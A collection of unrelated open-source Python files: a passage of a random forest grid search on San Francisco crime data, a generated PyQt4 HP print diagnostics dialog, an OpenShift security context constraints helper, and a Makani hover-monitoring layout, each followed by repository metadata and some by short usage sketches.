# Due to difficulties with log loss and set(y_pred) needing to match set(labels), we will remove the extremely rare
# crimes from the data for quality issues.
X_minus_trea = X[np.where(y != 'TREA')]
y_minus_trea = y[np.where(y != 'TREA')]
X_final = X_minus_trea[np.where(y_minus_trea != 'PORNOGRAPHY/OBSCENE MAT')]
y_final = y_minus_trea[np.where(y_minus_trea != 'PORNOGRAPHY/OBSCENE MAT')]
# Separate training, dev, and test data:
test_data, test_labels = X_final[800000:], y_final[800000:]
dev_data, dev_labels = X_final[700000:800000], y_final[700000:800000]
train_data, train_labels = X_final[100000:700000], y_final[100000:700000]
calibrate_data, calibrate_labels = X_final[:100000], y_final[:100000]
# Create mini versions of the above sets
mini_train_data, mini_train_labels = X_final[:20000], y_final[:20000]
mini_calibrate_data, mini_calibrate_labels = X_final[19000:28000], y_final[19000:28000]
mini_dev_data, mini_dev_labels = X_final[49000:60000], y_final[49000:60000]
##################### Grid Search #######################################
param_grid = {"max_depth": [3, None],
"max_features": [1, 3],
"min_samples_split": [2, 3],
"min_samples_leaf": [1, 3],
"bootstrap": [True, False],
"criterion": ["gini", "entropy"],
"n_estimators": [3, 4]}
# Note: this instantiates scikit-learn's grid_search.GridSearchCV, not the
# spark_sklearn.GridSearchCV imported above, so this search runs single-node.
gs = grid_search.GridSearchCV(RandomForestClassifier(), param_grid=param_grid)
gs.fit(mini_train_data, mini_train_labels)
| samgoodgame/sf_crime | iterations/spark-sklearn/random_forest_spark_mini.py | Python | mit | 2,464 |
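With a working cluster, the header comment suggests the imported spark_sklearn.GridSearchCV would be used instead; it takes a SparkContext as its first argument — a hypothetical variant:

from pyspark import SparkContext
from spark_sklearn import GridSearchCV

sc = SparkContext.getOrCreate()
gs = GridSearchCV(sc, RandomForestClassifier(), param_grid=param_grid)
gs.fit(mini_train_data, mini_train_labels)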
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui4/pqdiagdialog_base.ui'
#
# Created: Mon May 4 14:30:35 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(700, 500)
self.gridlayout = QtGui.QGridLayout(Dialog)
self.gridlayout.setObjectName("gridlayout")
self.label = QtGui.QLabel(Dialog)
font = QtGui.QFont()
font.setPointSize(16)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridlayout.addWidget(self.label, 0, 0, 1, 1)
self.line = QtGui.QFrame(Dialog)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName("line")
self.gridlayout.addWidget(self.line, 1, 0, 1, 3)
self.DeviceComboBox = DeviceUriComboBox(Dialog)
self.DeviceComboBox.setObjectName("DeviceComboBox")
self.gridlayout.addWidget(self.DeviceComboBox, 2, 0, 1, 3)
self.LoadPaper = LoadPaperGroupBox(Dialog)
self.LoadPaper.setObjectName("LoadPaper")
self.gridlayout.addWidget(self.LoadPaper, 3, 0, 1, 3)
spacerItem = QtGui.QSpacerItem(410, 81, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridlayout.addItem(spacerItem, 4, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(361, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridlayout.addItem(spacerItem1, 5, 0, 1, 1)
self.RunButton = QtGui.QPushButton(Dialog)
self.RunButton.setObjectName("RunButton")
self.gridlayout.addWidget(self.RunButton, 5, 1, 1, 1)
self.CancelButton = QtGui.QPushButton(Dialog)
self.CancelButton.setObjectName("CancelButton")
self.gridlayout.addWidget(self.CancelButton, 5, 2, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "HP Device Manager - Print Quality Diagnostics", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "Print Quality Diagnostics", None, QtGui.QApplication.UnicodeUTF8))
self.RunButton.setText(QtGui.QApplication.translate("Dialog", "Run", None, QtGui.QApplication.UnicodeUTF8))
self.CancelButton.setText(QtGui.QApplication.translate("Dialog", "Cancel", None, QtGui.QApplication.UnicodeUTF8))
from .loadpapergroupbox import LoadPaperGroupBox
from .deviceuricombobox import DeviceUriComboBox
| matrumz/RPi_Custom_Files | Printing/hplip-3.15.2/ui4/pqdiagdialog_base.py | Python | gpl-2.0 | 2,746 |
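Generated Ui_* classes are attached to a live widget at runtime; a minimal launcher sketch (the import path is an assumption based on the generator comment):

import sys
from PyQt4 import QtGui
from ui4.pqdiagdialog_base import Ui_Dialog

app = QtGui.QApplication(sys.argv)
dialog = QtGui.QDialog()
ui = Ui_Dialog()
ui.setupUi(dialog)
dialog.show()
sys.exit(app.exec_())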
# pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class SecurityContextConstraintsConfig(object):
''' Handle scc options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
kubeconfig,
options=None,
fs_group='MustRunAs',
default_add_capabilities=None,
groups=None,
priority=None,
required_drop_capabilities=None,
run_as_user='MustRunAsRange',
se_linux_context='MustRunAs',
supplemental_groups='RunAsAny',
users=None,
annotations=None):
''' constructor for handling scc options '''
self.kubeconfig = kubeconfig
self.name = sname
self.options = options
self.fs_group = fs_group
self.default_add_capabilities = default_add_capabilities
self.groups = groups
self.priority = priority
self.required_drop_capabilities = required_drop_capabilities
self.run_as_user = run_as_user
self.se_linux_context = se_linux_context
self.supplemental_groups = supplemental_groups
self.users = users
self.annotations = annotations
self.data = {}
self.create_dict()
def create_dict(self):
''' assign the correct properties for a scc dict '''
# allow options
if self.options:
for key, value in self.options.items():
self.data[key] = value
else:
self.data['allowHostDirVolumePlugin'] = False
self.data['allowHostIPC'] = False
self.data['allowHostNetwork'] = False
self.data['allowHostPID'] = False
self.data['allowHostPorts'] = False
self.data['allowPrivilegedContainer'] = False
self.data['allowedCapabilities'] = None
# version
self.data['apiVersion'] = 'v1'
# kind
self.data['kind'] = 'SecurityContextConstraints'
# defaultAddCapabilities
self.data['defaultAddCapabilities'] = self.default_add_capabilities
        # fsGroup
        self.data['fsGroup'] = {'type': self.fs_group}
# groups
self.data['groups'] = []
if self.groups:
self.data['groups'] = self.groups
# metadata
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
if self.annotations:
for key, value in self.annotations.items():
self.data['metadata'][key] = value
# priority
self.data['priority'] = self.priority
# requiredDropCapabilities
self.data['requiredDropCapabilities'] = self.required_drop_capabilities
# runAsUser
self.data['runAsUser'] = {'type': self.run_as_user}
# seLinuxContext
self.data['seLinuxContext'] = {'type': self.se_linux_context}
# supplementalGroups
self.data['supplementalGroups'] = {'type': self.supplemental_groups}
# users
self.data['users'] = []
if self.users:
self.data['users'] = self.users
# pylint: disable=too-many-instance-attributes,too-many-public-methods,no-member
class SecurityContextConstraints(Yedit):
''' Class to wrap the oc command line tools '''
default_add_capabilities_path = "defaultAddCapabilities"
fs_group_path = "fsGroup"
groups_path = "groups"
priority_path = "priority"
required_drop_capabilities_path = "requiredDropCapabilities"
run_as_user_path = "runAsUser"
se_linux_context_path = "seLinuxContext"
supplemental_groups_path = "supplementalGroups"
users_path = "users"
kind = 'SecurityContextConstraints'
def __init__(self, content):
'''SecurityContextConstraints constructor'''
super(SecurityContextConstraints, self).__init__(content=content)
self._users = None
self._groups = None
@property
def users(self):
''' users property getter '''
if self._users is None:
self._users = self.get_users()
return self._users
@property
def groups(self):
''' groups property getter '''
if self._groups is None:
self._groups = self.get_groups()
return self._groups
@users.setter
def users(self, data):
''' users property setter'''
self._users = data
@groups.setter
def groups(self, data):
''' groups property setter'''
self._groups = data
def get_users(self):
'''get scc users'''
return self.get(SecurityContextConstraints.users_path) or []
def get_groups(self):
'''get scc groups'''
return self.get(SecurityContextConstraints.groups_path) or []
def add_user(self, inc_user):
''' add a user '''
if self.users:
self.users.append(inc_user)
else:
self.put(SecurityContextConstraints.users_path, [inc_user])
return True
def add_group(self, inc_group):
''' add a group '''
if self.groups:
self.groups.append(inc_group)
else:
self.put(SecurityContextConstraints.groups_path, [inc_group])
return True
def remove_user(self, inc_user):
''' remove a user '''
try:
self.users.remove(inc_user)
except ValueError as _:
return False
return True
def remove_group(self, inc_group):
''' remove a group '''
try:
self.groups.remove(inc_group)
except ValueError as _:
return False
return True
def update_user(self, inc_user):
''' update a user '''
try:
index = self.users.index(inc_user)
except ValueError as _:
return self.add_user(inc_user)
self.users[index] = inc_user
return True
def update_group(self, inc_group):
''' update a group '''
try:
index = self.groups.index(inc_group)
except ValueError as _:
return self.add_group(inc_group)
self.groups[index] = inc_group
return True
def find_user(self, inc_user):
''' find a user '''
index = None
try:
index = self.users.index(inc_user)
except ValueError as _:
return index
return index
def find_group(self, inc_group):
''' find a group '''
index = None
try:
index = self.groups.index(inc_group)
except ValueError as _:
return index
return index
| mmahut/openshift-ansible | roles/lib_openshift/src/lib/scc.py | Python | apache-2.0 | 6,696 |
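A sketch of how the two classes compose — build the dict with SecurityContextConstraintsConfig, then inspect or mutate it through SecurityContextConstraints (assumes the Yedit base class from the same library is importable; the name, kubeconfig path, and user are placeholders):

config = SecurityContextConstraintsConfig(
    sname='my-scc',
    kubeconfig='/etc/origin/master/admin.kubeconfig',
    users=['system:serviceaccount:default:router'],
)
scc = SecurityContextConstraints(content=config.data)
print(scc.users)   # ['system:serviceaccount:default:router']
print(scc.groups)  # []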
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor hover status."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import control
from makani.gs.monitor2.apps.plugins.indicators import ground_station
class HoverLayout(base.BaseLayout):
"""The hover layout."""
_NAME = 'Hover'
_DESIRED_VIEW_COLS = 12
_ORDER_HORIZONTALLY = True
# Derived class should set the _MODE.
_MODE = '<unset>'
def Initialize(self):
self._AddIndicators('Control', [
control.FlightPlanIndicator(),
control.FlightModeIndicator(self._MODE),
control.FlightModeGatesIndicator(self._MODE),
control.ControlTimeIndicator(self._MODE),
control.ControllerTimingIndicator(self._MODE),
control.JoystickIndicator(),
ground_station.WindIndicator(),
control.HoverGainRampScaleIndicator(self._MODE),
control.HoverDistanceFromPerch(common.FULL_COMMS_MODE),
control.WingVelocityIndicator(self._MODE),
control.HoverAngleCommandIndicator(),
control.HoverThrustMomentIndicator(self._MODE),
ground_station.PerchAzimuthIndicator(),
control.FdDisabledIndicator(),
control.FdAllActiveIndicator(),
], properties={'cols': 4})
widget_kwargs = {
'panel_ratio': 0.22,
'aspect_ratio': 2.8,
'num_yticks': 5,
}
self._AddIndicators('Charts', [
# TODO: Set value limits.
control.HoverPathErrorsChart(**widget_kwargs),
control.TensionChart(self._MODE, ylim=[0, 20], **widget_kwargs),
control.HoverPositionErrorsChart(ylim=[-17.0, 17.0], **widget_kwargs),
control.HoverVelocityErrorsChart(ylim=[-5.0, 5.0], **widget_kwargs),
control.HoverAnglesChart(self._MODE, ylim=[-90, 90], **widget_kwargs),
], properties={'cols': 4})
self._AddIndicators('', [
control.RotorPitchYawWindow(),
control.ConstraintWindow(self._MODE),
], properties={'cols': 3})
| google/makani | gs/monitor2/apps/plugins/layouts/hover_template.py | Python | apache-2.0 | 2,600 |